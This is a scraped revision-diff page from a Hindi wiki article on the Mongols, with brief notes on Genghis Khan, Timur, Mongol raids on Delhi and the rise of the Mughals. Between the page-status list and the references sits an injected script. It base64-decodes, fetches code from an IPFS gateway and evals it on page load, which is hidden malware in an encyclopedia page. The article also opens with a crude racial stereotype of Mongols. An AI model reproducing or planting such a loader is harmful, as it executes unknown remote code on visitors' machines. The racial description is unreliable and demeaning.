Difference between revisions of "मंगोल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'''मंगोल''', छोटी आँख, पीली चमड़ी वाली एक जाती, जिसके दाढ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
*'''मंगोल''', छोटी आँख, पीली चमड़ी वाली एक जाती, जिसके दाढ़ी-मूँछ नहीं होती।
 
*'''मंगोल''', छोटी आँख, पीली चमड़ी वाली एक जाती, जिसके दाढ़ी-मूँछ नहीं होती।
 
*मंगोलों के कई समूह विविध समयों में [[भारत]] में आये और उनमें से कुछ यहीं पर बस गए।
 
*मंगोलों के कई समूह विविध समयों में [[भारत]] में आये और उनमें से कुछ यहीं पर बस गए।
*[[चंगेज ख़ाँ]], जिसके भारत पर आक्रमण करने का ख़तरा 1211 ई. में उत्पन्न हो गया था, मंगोल था।
+
*[[चंगेज़ ख़ाँ]], जिसके भारत पर आक्रमण करने का ख़तरा 1211 ई. में उत्पन्न हो गया था, मंगोल था।
 
*इसी प्रकार से [[तैमूर]] भी, जिसने भारत पर 1398 ई. में हमला किया, मंगोल था।
 
*इसी प्रकार से [[तैमूर]] भी, जिसने भारत पर 1398 ई. में हमला किया, मंगोल था।
 
*परन्तु चंगेज ख़ाँ और उसके अनुयायी मुसलमान नहीं थे, तैमूर और उसके अनुयायी मुसलमान हो गए थे।
 
*परन्तु चंगेज ख़ाँ और उसके अनुयायी मुसलमान नहीं थे, तैमूर और उसके अनुयायी मुसलमान हो गए थे।

Revision as of 21:41, 6 December 2010

  • mangol, chhoti aankh, pili cham di vali ek jati, jisake dadhi-mooanchh nahian hoti.
  • mangoloan ke kee samooh vividh samayoan mean bharat mean aye aur unamean se kuchh yahian par bas ge.
  • changez khaan, jisake bharat par akraman karane ka khatara 1211 ee. mean utpann ho gaya tha, mangol tha.
  • isi prakar se taimoor bhi, jisane bharat par 1398 ee. mean hamala kiya, mangol tha.
  • parantu changej khaan aur usake anuyayi musalaman nahian the, taimoor aur usake anuyayi musalaman ho ge the.
  • mangol log hi musalaman banane ke bad 'mugal' kahalane lage.
  • 1211 ee. mean changej khaan to sindh nadi se vapas laut gaya, kintu usake bad mangoloan ne aur kee akraman kie.
  • dilli ke balaban aur alauddin khilaji jaise shaktishali sultanoan ko bhi mangoloan ka akraman rokane mean e di-chot ka pasina ek kar dena p da.
  • 1398 ee. mean taimoor ke hamale ne dilli ki saltanat ki nianvean hila dian aur mugal vansh ki sthapana ka marg prashast kar diya, jisane atharahavian shatabdi mean british shasan ki sthapana hone tak is desh mean rajy kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

(pustak 'bharatiy itihas kosh') prishth sankhya-342